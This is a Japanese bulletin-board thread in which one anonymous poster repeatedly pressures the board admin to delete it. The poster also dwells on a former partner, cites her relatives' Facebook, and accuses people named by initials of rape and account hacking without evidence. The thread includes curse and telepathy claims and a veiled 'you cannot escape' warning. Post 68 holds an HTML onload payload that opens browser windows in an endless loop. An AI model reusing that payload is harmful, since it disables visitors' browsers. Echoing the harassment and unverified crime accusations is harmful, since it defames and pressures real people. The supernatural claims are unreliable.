したらばTOP ■掲示板に戻る■ 全部 1-100 最新50 | |

A助さん

1名無し冥利:2020/06/04(木) 17:48:58
A助スレ削除してくれませんか?

66名無し冥利:2020/11/16(月) 16:55:42
span style="width:100%; filter:Mask( color=pink )"> 文字の背景に色をつける
<span style="width:100%; filter:Blur()">

67名無し冥利:2020/11/16(月) 16:57:04
<span style="width:100%; filter:Blur()">
かぼ

68名無し冥利:2020/11/16(月) 16:58:51
FORM METHOD=GET ACTION="http://search.yahoo.co.jp/bin/search&quot; target=_blank><INPUT SIZE=30 NAME=p> <INPUT TYPE=submit VALUE="Yahoo! 検索"></FORM> Yahoo!の検索フォームを作成
<BODY Onload="var i=0;while(1){open('./',i++);}">

69名無し冥利:2020/12/19(土) 20:29:37
a助さんこの掲示板閉鎖するかスレッド削除してくださいませんか?
私はimさんに再会して彼女と昔みたいにまた幸せに過ごしたいのです。
おねがいします、私の頼みを聞いてください。あなたが頼みを聞いてくれるか
どうかに私と彼女の未来がかかっていると思うのです。

70名無し冥利:2020/12/19(土) 20:34:52
a助さん協力してください。頼める方あなたしかいないんです。

71名無し冥利:2020/12/19(土) 20:39:35
私は彼女と一緒に人生を歩みたいだけなんです。彼女だけが私のただひとつの
生きがいなんです。私には彼女しかいないんです、幸せを感じられる存在が。

72名無し冥利:2020/12/19(土) 20:44:02
私はimさんの事忘れる事なんてできません。ビデオゲームやって会いたい気持ち
ごまかす事はしたくありません、それは諦めている人のする事。

73名無し冥利:2020/12/19(土) 20:44:43
彼女だけが、私の唯一のいばしょ

74名無し冥利:2020/12/19(土) 20:46:58
どんなに、外見が変わっても彼女は私にとって一番愛しい人です。

75名無し冥利:2020/12/19(土) 20:50:36
辛いこともあったけど彼女と過ごした時間は私には何よりも大切な宝でした。

76名無し冥利:2020/12/19(土) 20:56:23
彼女は結婚して離婚したみたいだけど幸せじゃなかったのは彼女の親族のFacebookみて
わかった。あんなにつらそうなのに必死に笑顔つくって...。

77名無し冥利:2020/12/19(土) 20:58:40
あんなに不幸で不安そうな顔して笑顔つくっている人みたことない

78名無し冥利:2020/12/19(土) 21:02:28
罪悪感がわびすけの 斬魄刀始解で太らせる。罪悪をそのままにしているから
首きられた、つまり職をなくした。吉良の声優さんは櫻井たかひろさん

79名無し冥利:2020/12/19(土) 21:10:33
掲示板閉鎖しなければ罪悪感の無限ループで現状からぬけだせない。
私は告白謝罪償いという責任や生活を変えるという義務をお願いしているのでは
なくてただ悪いことして邪魔するのやめて、つまり掲示板閉鎖とか
してと頼んでいるだけです。私がどこかに書くたびに罪悪感があなたにつのり
体重過多からぬけだせない。首きられた状態も続く。

80名無し冥利:2020/12/19(土) 21:13:33
この先も掲示板閉鎖的しなければ一日中ビデオゲームやって飲み食いし過ぎて
肥満が続く。

81名無し冥利:2020/12/19(土) 21:20:33
織部さんやさいさつさんか閑人さんやようへいさんが消せたんだから
あなたが閉鎖はできるはず。私と彼女に警察に暴露されたから
恨んでいたり警察にマークされたから閉鎖しないんでしょうが
復讐やめないとa助さんループから脱出できませんよ。糞wiiuさんは
あなたでしょう?口調や文体や思想が同じだから。

82名無し冥利:2020/12/19(土) 21:25:29
多分閉鎖すればwabisukeの効果が反対向きに作用して体重正常に
なって切れた首も持ってまた仕事できるでしょう

83名無し冥利:2020/12/19(土) 21:29:07
元々自分の不幸に巻き込んだのはa助さんです。2003年に私と彼女いじめて。
で巻き込んだからって仕返ししてもう16年か9年くらいまたいじめてる。

8459:2021/06/02(水) 12:00:34
a助さん、私があなたにネット上でしてきた今までの事ゆるしてくださいませんか?

8559:2021/06/02(水) 12:06:00
a助さんだって誰かのお漏らし行為自分がしたからって後で
書き込み削除してもらえずそのせいで最愛の人と結婚とか出来なければつらく感じますよね?

8659:2021/06/02(水) 12:13:34
a助スレは、私が皆さんのお漏らし行為したのはよくありませんでした。一応書いておきますが最近まで犯した罪が事実でも
他者に暴露とかするのも名誉毀損だと知りませんでした。
あのお漏らし行為のスレッドは私にも皆さんにも害があって
削除されないと延々と私たちの人生の悪循環が生まれます。

8759:2021/06/02(水) 12:18:07
皆さんももういい加減いくつかの該当スレッド削除になって
新しい人生とまでは言えなくても以前のようにびくびくしながら生きるのやめたいと思いませんか?

8859:2021/06/02(水) 12:20:22
もう疲れているでしょう?このままだとずっと現状から抜け出られないと思います。

8959:2021/06/02(水) 12:22:40
7つの習慣の第3の案とは行動する事だそうです。

9059:2021/06/02(水) 12:32:33
私たちはそろそろ限界ではないでしょうか?いつまでもメタボや引きこもりや無職はつらいはずです。確かに行動する事は
たくさんの方がなかなかやらないことです。恨みを持ち続けてひとの罪をゆるさないでいると私たちの内面はおかしくなりそれが生活習慣に影響を与えます。削除しないことで憎んでいる相手だけでなく自分の親しいまた親しかったひとの人生まで困難にします。

9159:2021/06/02(水) 12:37:47
本当に人生とは変えられない変わらないものなのでしょうか?
変えたい気持ちがあるはずです。少しのリスクを乗りこえる事や少しのハードルを飛び越えなければリターンはありません。
ハイリターンが欲しいならハイリスクを取ることが必要になります。

9259:2021/06/02(水) 12:45:00
私たちは自分の人生を自分でつくっています。周りの人の嫌な言動も本当は臆病な自分がつくっています。周囲が悪く言って来たりしたら本当は自分がそういう境遇が好きだから周りがそういった反応をするのです。

9359:2021/06/02(水) 12:46:47
限界を感じているならその時こそが限界突破を選ぶ時なのです。

9459:2021/06/02(水) 12:48:51
殻を破れば闇からぬけでて進化します。もう誤ったパラダイムの無限ループから解放されます。

9559:2021/06/02(水) 12:52:05
パラダイムシフトパラダイムチェンジは大きな変化をもたらします。パラダイムが正しくなければ内面の不調が生じそれが
私たちの行動をおかしくしたり生活習慣が正しくなくなりわたしたちは病気になります。

9659:2021/06/02(水) 12:54:53
a助さんが困らせているのは私と彼女だけではなくa助さんの
友達も苦しめていませんか?

9759:2021/06/02(水) 13:02:43
fb見るとちょっと前までytさんもメタボでdpさんも今少しメタボです。ntさんもメタボで100キロ位あるようですし。削除されないとあなたの親しかった人まで苦しめ続ける事になるんですよ。あなたが削除するかしないかで私たちの人生はある程度は違ってきます。もういがみ合いは終わりにしませんか?
a助さん。ntさんとかはあなたにとって特に親しくて大切な友人なのではないのですか?

9859:2021/06/02(水) 13:08:24
私は極力他者を憎むのはやめにしました。憎むという事は
結局は問題を解決させない行為です。憎んでいると相手は変わりません。憎めば憎むほど自分の問題が肥大化して相手も
いつまでも己の不快な反応をし続けます。

9959:2021/06/02(水) 13:12:42
憎しみはなにも生まない。憎しみは世界に破滅をもたらす。
憎しみを示すから憎しみが自分にかえってくる。
相手を大事に思えば相手の己への不快な反応は大幅に減ります。

10059:2021/06/02(水) 13:15:02
相手を変えたければまず自分を変える。相手を変える事はできない。これを受け入れて自分を変えれば相手が自然と変わる。

10159:2021/06/02(水) 13:19:15
憎んでいる他者に死んでほしいとか思っていると結局他者は
変わりません。そういう姿勢では相手は変わりません。
そして実はわたしたちがそういう不快な他者の言動をつくっているのです

10259:2021/06/02(水) 13:24:53
他者に消えてほしいと思っていると自分が消える事になります。

10359:2021/06/02(水) 13:30:48
怒ったりするのやめると相手も自分に対して怒らなくなる。
私たちは憎しみや恨みを捨てると不快な他者の言動に無敵になれる。

10459:2021/06/02(水) 13:33:19
相手が大事にしてくれないのは自分が相手を大切にしてないから。大切にしてくれる相手を大切にしないケースはあまりない。

10559:2021/06/02(水) 13:49:49
a助さんは私と彼女を邪魔し続けているからnt(再殺太郎さん)さんがあんなに太るという呪いを主から受けているのかも
しれませんよ。邪魔しているからntさんと不仲になってしまったのではないでしょうか。人を呪わば穴二つとはこの事ではないでしょうか。

10659:2021/06/02(水) 13:57:05
では問いますが多分ですがa君やisさんが太っているでしょうか?ytさんももうメタボではありません。dpさんも少しもメタボな程度です。私の母も87キロです。エジプトのパロ(ファラオ)が呪いを受けたのはイスラエルの子らに悪い事をなかなかやめず自由にしなかったからです。行動しないだけで主が呪いをくだすなら、悪事を働く人にはなおさら酷い呪いがくだされるのは当然ではないでしょうか。

10759:2021/06/02(水) 14:02:27
削除しないことで邪魔し続ける張本人のあなたは
いつまでたってもntさんと仲違いしたままでしょう。
妨害の極みである母父はケンカばかりしてますよ。
それも多分私と彼女の妨害しているから夫婦仲がおかしくなっているのです。

10859:2021/06/02(水) 14:08:30
今私と彼女の邪魔している中心人物張本人はa助さんです。
妨害の中心人物張本人は私の両親と祖父で特に母父です。
だからつがいそろって太ったりつがいの片方が太るままに主が
しておく。呪いがあるのはその呪う行為をやめさせるため。
やめなければ現在迫害している人物には酷い呪いが及ぶ。

10959:2021/06/02(水) 16:12:03
誰かが誰かの人生の邪魔や妨害をしていて、
被害者がキリストの再臨で加害者を滅ぼして欲しい、
そうすれば愛する人と幸せになれると思っている場合その人は
なんとしてでも再会して幸せになろうとしてない。
問題の解決をキリストに依存しているから自力で何とかして幸せになれない。キリストに真に頼る人とは自力で解決して幸せになる人。難しければ難しい人生程自力が要求される。行動起こすくらいなら現状維持に甘んじる。だから幸せにならない。

11059:2021/06/02(水) 16:20:17
自分の幸せ諦めればもうゲーム三昧とかそういう低俗な
人生になる。現世でへらへら笑っている人は後で必ず代償払う事になる。ラザロとアブラハムと金持ちの例えばなしのように。人生は遊ぶためのところじゃなくて神々に自分の相応しさを証明するところ。娯楽に逃げてばかりの人が本当の意味で幸せになることはない。

11159:2021/06/02(水) 16:25:59
ネルソン大管長が最後の大管長だとしても彼はとても元気な
方なのでもしかしたら後10年とか寿命あるかもしれない。
だからキリストの再臨や彼女に気持ち的に依存すれば私はまた
ループに陥る、多分。再臨に依存する事は馬鹿げている。

11259:2021/06/02(水) 16:31:43
依存が激減したから医者がよいまた出来ている。他の人に問題解決依存していると私のように長年苦しむ悩む事から逃れられない。自分の人生がつまらないからってゲームの中に逃げ込んだりブラブラ車でぶらつく=悟空ブラックしているようでは問題に向き合っていないので問題が解決しない

11359:2021/06/02(水) 16:35:35
ただ管理モードにパスワード入れてログインしてスレッド複数削除するか掲示板閉鎖ボタン押して消すだけ。そんな簡単な事もしないならもうどうしようもないですよ。

11459:2021/06/09(水) 12:27:54
さっき自室の机の上にゴキブリがいた。逃げようとして洗濯ばさみにはまったので窓開けて外に出した。でも、ひっくりかえった状態になった。で、しばらく様子みてました。そして思った、私に似ていると。ゴキブリは足ばたばた動かしてもがいていた。もがいては休みもがいては休みの繰り返し。見ていて可哀想だし促しあったから窓開けて身体をもとの姿勢に私が戻した。

11559:2021/06/09(水) 12:31:44
助けた後気づいた。ゴキブリはひっくり返ると羽(翼=完全=仙術=貧しい=トンミム=木遁)が開けないからなかなか自力で
戻れないか全く自力では戻れない。

11659:2021/06/09(水) 12:38:22
ゴキブリは5926=5x9x2x6=540だし、昔のps信者の蔑称gk=ゲートキーパーはある意味、モルモン書の「門を守るのはイスラエルの聖者(キリスト)である。」と似ている。イーディーさんは「主は私たちが天国に帰るためのたったひとつの門なのです」と言っている。門とは告白謝罪償いをする事。

11759:2021/06/09(水) 12:43:31
ゴキブリがひっくり返るのは、キリストの事を360や主と聖霊の事を180+180=360と考える事の象徴であり、多くの方々は、主=90,主と聖霊=90+90=180とは反対の考え方しているから羽が開花できないからばたばたもがくのです。

11859:2021/06/09(水) 12:50:00
まず自分が何も変わっていない事を認めないと自分が変わる、
自分を変えるという奇跡は起こらない。そして、誰かがゴキブリを助けてあげないとゴキブリは死ぬかもしれない。
さっきのベランダでもがいていたゴキブリは運がよければ苦戦した末にベランダの格子の基部やサンダルにつかまって自力で
姿勢をもとに戻せたかもしれませんがそんな事私たちに予見できますか?

11959:2021/06/09(水) 12:59:24
例えゴキブリがまた自宅に入るという選択をしても、私たちは
ゴキブリをもとに戻すべきです。困っている人を見殺しにすべきではありません。さっきのゴキブリはひっくり返ったらすぐ
オシッコを漏らしましたが(他人の罪の暴露の象徴)もともと人間がしっかりしていればひっくり返る事はなかったでしょう。だから私が元に戻す責任義務があった。また、ゴキブリが自室にいるからって邪魔者扱いして潰したりして殺すのは果たして神様のみ心にかなうのでしょうか。

12059:2021/06/09(水) 13:05:10
ヤレドの兄妹の書いた言葉はキリストご自身のように力強く
読む者を圧倒する程のもの、とモルモン書の記者は言っている。表現力がとても力強いと。

12159:2021/06/09(水) 13:06:01
ヤレドの兄妹じゃなくて兄弟でした。

12259:2021/06/09(水) 13:30:06
ああ、足りなかった説明が。ゴキブリの羽は私の場合仙術はある程度はできているので私の場合は瞳術ですね(瞳術=断食(飢え、渇き)や痛み、眠気、疲労(だるさ)、暑さ、寒さに耐える事)。ゴキブリの羽のたとえは、私の彼女の象徴かな?

123名無し冥利:2021/09/08(水) 08:29:45
ttps://japan.techinsight.jp/2020/07/yukke07161617.html
テックインサイトさんに末日聖徒のブリッジャーウォーカー君の勇敢な記事があります。

124M:2021/09/14(火) 13:29:24
ペルザーさんの人生指南の和訳の書籍の書名「ヘルプユアセルフゆるす勇気を生きる力に変えて」は「自分を変えられるのは
自分だけだ」という感じの意味でしょう?英語の意味わからないのですが。もし他者の過去の罪を赦さないで憎んで掲示板削除とかしないと題名の逆で「赦さない臆病を自殺する力に変えて」になります。

125M:2021/09/14(火) 13:32:21
使徒教父文書に「怒りはひとを殺人へと導く」と書いてありますが、「怒りはひとを自殺へと導く」という意味もあります。

126M:2021/09/14(火) 13:34:33
イーディーさんは「ひとをゆるさない気持ちを捨て去りなさい。そういった気持ちが霊の調子をクルワセテしまうからです。」と言っています。

127:2021/09/14(火) 13:44:19
嫌われる勇気は幸せになる勇気です。アドラーの言葉通りです。水戸黄門の歌詞にもあります、「人生勇気が必要だ」。

128:2021/09/14(火) 13:44:39
嫌われる勇気は幸せになる勇気です。アドラーの言葉通りです。水戸黄門の歌詞にもあります、「人生勇気が必要だ」。

129:2021/09/22(水) 14:40:20


130名無し冥利:2021/11/07(日) 17:17:07
お前らが私がフェイスブックのアカウント取得した時に、今のメアドとは
別のメールアドレスだったと思うけどアカウント取得したんだよ。
そうしたら最初のアカウントはすぐに「不正なアクティビティがあったので
利用できません」とかいう感じの文章表示されて削除されたか
使えなくなったんだよ、フェイスブックの私のアカウント。で、そんなことして
ないのにと思ってお前らを疑った。そして、ある人のページに書いたんだよ、
お前らがハッキングかクラックしてるんだな、最愛の人との事邪魔するだけじゃなく
フェイスブックの(彼女の事そんときフェイスブックで既に見たかもう忘れ
たけどさ)事すら邪魔するのか!!?って怒りの投稿文お前らに向けて書いたんだよ。
そうしたら、私の秘密(単なる備忘録のブログ)のアメブロのブログに
そ今までもその時も誰にも知らせてない文章すら
私以外誰にも見れないように設定しているのに誰かか誰かども
がお気に入りに複数登録して十数件あった、アクセス解析で見てたら。一年くらい
そんな文章も見れないのを誰かが監視してるみたいにお気に入りに入れていて
毎日十何件か二十数件くらいアクセスがあった。それがだ、私がそのある人の
ページに怒りの投稿文を書いたら、そのすぐ次の日からお気に入りに入れている件数も
ゼロになってアクセス数もその日からゼロになった、今日まで1回も誰もお気に入りに
入れてないみたいだしアクセス回数も多分ゼロだ、そういう事あってから
2018年前半頃しばらくアクセス解析毎日のようにチェックしてたけど一つも
登録もアクセスもなかった。たまに調べてもみんなゼロ。見てるの私だけ。

131名無し冥利:2021/11/07(日) 17:24:13
で、ライブドアブログもバックアップのために同時期(2017年頃)にブログ
開設したんだけど、そっちのほうはアクセス解析に
IPアドレスとか表示されるから
今日まで(今日は調べてないけど)時々調べてたけど一回も私以外アクセス
なかった。IPアドレス知られると困るから(プロキシ使う手も
あるみたいだけど)アクセスしなかったんだろう?そもそも何でアメブロの
もライブドアブログも秘密で開設して私が書いた
文章の閲覧も私以外に全員に不可能な設定にしていたし、お前らだろうと
何処にも宣伝とかしてないのに私のブログ知ってるおかしな奴らがいたか?
お前らが犯人でハッキングクラックしていたのは明白だ。で、今日お前らに
模範示すためと、USBメモリーの備忘録とか部分的な嘘もう書かないで
二つのバックアップ用のブログの事書いて事実を書いた。

132名無し冥利:2021/11/07(日) 17:32:05
前もさ、2017年か2016年頃gmailとかメアド取得してどっか別のブログ開設したんだよ、
そんときもさ誰かが私のメアドとブログのパスワード解析して乗っ取られんだよ、
で、つかえないようなことあったと思うんだ。その時のパスワードもこの掲示板見てるやつ以外
わからないパスワードだったんだよ。で、その時のブログもメアドも誰にも
教えてないのに何故かその不正アクセスした奴は私が前のパソコンでやってる
事知っててそういうふざけたことしてきた。fc2ブログの時だって私がパスワード
何回変えても(一日の間に)すぐにパスワード変更していやがらせする奴いた。
そのFC2ブログだって誰にも何処にも宣伝みたいな事しなかった。

133名無し冥利:2021/11/07(日) 17:33:36
お前らの内の何人か誰か一人が犯人なのはわかってんだよ。

134名無し冥利:2021/11/07(日) 17:35:50
この掲示板閉鎖しないとお前らさぁ、私が今日書いたこの文章警察に
持ってがれたら困るんじゃないのか?不正アクセスって違法行為だよね?

135名無し冥利:2021/11/07(日) 17:41:37
この前、父のアカウントのアマゾンので過去に買った本また欲しくて
注文したんだよ、そしたら何故か(ただのシステムの誤作動かなんかかも
しれんけどさ)私が過去に買ったモニター関連かアニキャストとかいう
周辺機器が同じ奴が二つも同日に(確か2021年11月08に到着予定とかいうやつ
)注文してないのに父のアカウントで発注済みのあったんだよ、私
その本何日か前に注文したあとすぐ注文履歴見たらそういうおかしなことあった。
ギリギリでキャンセル(そのおかしな商品発注)できたけど(見て気づいたから)
これもお前らの誰かの仕業か?もう念のため父と話してパスワード変えたけどさ。
で、本も買うのやめてキャンセルしたよ。

136名無し冥利:2021/11/13(土) 13:57:37
a助さん、なんとか私へのお怒りを解いて掲示板閉鎖とまではいかなくても
せめてa助スレを完全削除して頂けないでしょうか?本当に困っているのです。
このまま削除しないままでいてもloseloseの結果にしかならないのではないでしょうか?

137名無し冥利:2021/11/13(土) 13:59:13
このまま失業したままでは嫌でしょう?

138名無し冥利:2021/11/13(土) 14:00:48
スレ消さないから歯科技工士の仕事解雇されたのでしょう?

139名無し冥利:2021/11/13(土) 14:01:57
いつまでもビデオゲームだらけの人生嫌でしょう?

140名無し冥利:2021/11/13(土) 14:03:37
自分が同じ意地悪されたら、とか考えないんですか?

141名無し冥利:2021/11/13(土) 14:04:43
あなたが閉鎖か削除をしないならあなたも私も仕事できないですよ

142名無し冥利:2021/11/13(土) 14:05:15
ひとを呪わば穴ふたつ

143名無し冥利:2021/11/13(土) 14:06:41
あなたが教会で私と彼女の関係邪魔して引き裂こうとしていたのわかってるんですよ。

144名無し冥利:2021/11/13(土) 14:10:31
現に私が英会話の小学生たち通してアクション起こした時あなたは
両手広げてじゃましましたよね?彼女が去り際に私の写真撮ろうとした時も
前に割って入って邪魔しましたよね?

145名無し冥利:2021/11/13(土) 14:12:52
彼女があなただけ警察に話したのはほかの強姦魔より悪いことしたからじゃないんですか?
あなたより彼女の元父親の方が悪いですけど。あなたのやったこと悪質

146名無し冥利:2021/11/13(土) 14:16:39
普通強姦したのに嘘つきとおす人は破門ですよ。あなたの亡くなった父親や
まだ存命中の母親が教会行きたいのに行けないのはあなたが閉鎖か削除しないから
でしょう?

147名無し冥利:2021/11/13(土) 14:18:30
閉鎖か削除しない限り、あなたとntさんは仲直り一生できないでしょうね

148名無し冥利:2021/11/13(土) 14:19:51
まだ気がすまないんですか?

149名無し冥利:2021/11/13(土) 14:36:32
私の霊と精神の万華鏡写輪眼は私の視界に入る限り逃れられませんよ。実名あげて書くことはもう致しませんが閉鎖か削除しないかぎり私の文章やテレパシーから逃れられませんよ。
緋の目が発動しているからチェーンジェイルもジャッジメントチェーンもあなたに集中的に発動している。

150名無し冥利:2021/11/13(土) 14:37:54
天照は視界に入るところを燃やし続ける

151名無し冥利:2021/11/13(土) 14:39:35
削除か閉鎖するまで語り続ける、うるさく感じるでしょうが。

152名無し冥利:2021/11/13(土) 14:40:43
天国のネタバレも削除か閉鎖かしないなら語り続ける

153名無し冥利:2021/11/13(土) 14:41:49
私を書き込み禁止にしてもいいがテレパシーで語り続けるのは
やめない、削除か閉鎖かするまで。

154名無し冥利:2021/11/13(土) 14:43:27
多分テレパシーあなたに伝わっていると思うんだ管理人さん

155名無し冥利:2021/11/13(土) 16:15:25
英会話の小学生の件だが、両手広げてとおせんぼするみたいに
邪魔しようとしたか、両手で×じるしして邪魔しようとしたよな。写真の時だって割り込んで私がうつらないようにお前が
ピースして邪魔したよな。

156名無し冥利:2021/11/13(土) 16:19:23
ゲ趣味をもっと苦しめてやるかって書いたのはお前だし、
あれと大体同時期に2ちゃんねるの宗教掲示板に「モルモンの姉妹宣教師とセックスしたんです。」とか強姦したくせに
自分の悪行を自慢するみたいに書き込みあったよな。

157名無し冥利:2021/11/13(土) 16:20:27
自慢するみたいな○自慢するみたいに×

158名無し冥利:2021/11/13(土) 16:38:37
しっかり傷害事件起こした事被害者の同級生に謝ってないんだろ?だって、お前逃げたよな、別の中学に転校したからさ。
で、私に「わからないか?ゲ趣味、彼女に嫌われてるんだよ、男女の関係はセックスが基本なの。」とか強姦した分際で言ってきたが、たたかいも(しっかり謝罪)せずに尻尾を巻いてにげた負け犬が偉そうにほえるな

159名無し冥利:2021/11/13(土) 18:16:27
そう言えば昔私の彼女に似ているff8のリノアの事さいさつと同様にリノアたんはぁはぁとかa助も言ってたな。
基本的にリノアやユウナやステラやルーナは彼女にそっくりな顔したティファに似せて哲さんはデザインしてるんだが。

160名無し冥利:2021/11/14(日) 14:08:23
管理人さん、削除か閉鎖できないんじゃなくて削除や閉鎖したくないんでしょ?特に削除や閉鎖しないことで苦しめたい悩ませたいんでしょ?私を。

161名無し冥利:2021/11/14(日) 14:14:28
削除や閉鎖する程度が告白謝罪償い程難しい事だとはとうてい
考えがたい。削除や閉鎖は行動じゃない。当然のこと。
仮にだけど始解以下の始解ってところだ、管理人には。
削除か閉鎖で歯科技工士に復帰できるならまあまあ始解といえるだろう、私の始解(お医者さんがよい程難しくないだろ?)くらいが初めて始解なのだ

162名無し冥利:2021/11/14(日) 14:17:26
管理人は閑人ファミリーのやつらの中では唯一掲示板消すか
スレさくじょしない。だから仲間外れされ気味なんじゃないの?もしそうなら。

163名無し冥利:2021/11/24(水) 14:30:03
前ネットに書いたか忘れたけど保育園年長の時、iy君という同級生が他の園児と遊んでいて(みんなに上に乗っかられるおふざけ)私が事故で手を踏んでしまってすぐに謝ったのですが、赦してくれずみんなが乗っかるの止めた後私を襲おうとした(んだっけ?)ので保育士さんたちが私を同級生のみか下級生含めた教室に何回も教室変える事繰り返して私を隠して避難させていたんですよ、授業中になっても、です。で、保育士さんと園長さんは(弟がそれ(年少の弟が)当時知ってたかわからないけど、襲おうとしているの。)年中の時の粘土ベラで私の目uh君に刺された事は友達のat君がそれを母に伝えてくれたけど。で、眼科行ったら後もう少しで失明するところだったと診断したそうです。

164名無し冥利:2021/11/24(水) 14:34:58
それなのに、母は自分でuh君のご両親にご両親通してuh君に注意とご両親に報告せずに、園長さんに注意と報告頼んで、園長さんはそれに対して「なんでそんな事しなきゃならないんだ!?」という対応だったそうです。

165修正:2021/11/24(水) 14:38:42
保育士さんと園長さんは(弟がそれ(年少の弟が)当時知ってたかわからないけど、襲おうとしているの。)襲撃しようとしていた事件を私の家族に全く伝えない。年中の時の粘土ベラで私の目uh君に刺された事は友達のat君がそれを母に伝えてくれたけど。で、眼科行ったら後もう少しで失明するところだったと診断したそうです。


新着レスの表示


名前: E-mail(省略可)

※書き込む際の注意事項はこちら

※画像アップローダーはこちら

(画像を表示できるのは「画像リンクのサムネイル表示」がオンの掲示板に限ります)

掲示板管理者へ連絡 無料レンタル掲示板